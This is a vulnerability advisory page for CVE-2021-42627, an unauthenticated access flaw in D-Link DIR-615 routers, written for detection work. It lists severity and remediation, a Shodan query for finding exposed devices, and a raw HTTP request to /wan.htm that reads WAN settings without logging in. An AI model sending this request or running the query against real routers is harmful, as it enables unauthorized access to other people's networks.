🔙 목록으로 돌아가기

CVE-2021-42627: D-Link DIR-615 - Unauthorized Access

TitleD-Link DIR-615 - Unauthorized Access
AuthorFor3stCo1d
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to the router, potentially compromising the network and exposing sensitive information.
RemediationApply the latest firmware update provided by D-Link to fix the vulnerability and ensure strong and unique passwords are set for router administration.
CVSS Score9.8
EPSS Score0.61191
CVE IDCVE-2021-42627
Shodan Queryhttp.title:"Roteador Wireless"cpe:"cpe:2.3:h:dlink:dir-615"
Tags cve2021 cve d-link router unauth dir-615 roteador dlink vuln

🔍 Vulnerability Description

D-Link DIR-615 devices with firmware 20.06 are susceptible to unauthorized access. An attacker can access the WAN configuration page wan.htm without authentication, which can lead to disclosure of WAN settings, data modification, and/or other unauthorized operations.

🌐 HTTP Request

GET /wan.htm HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-42627.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-42627.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A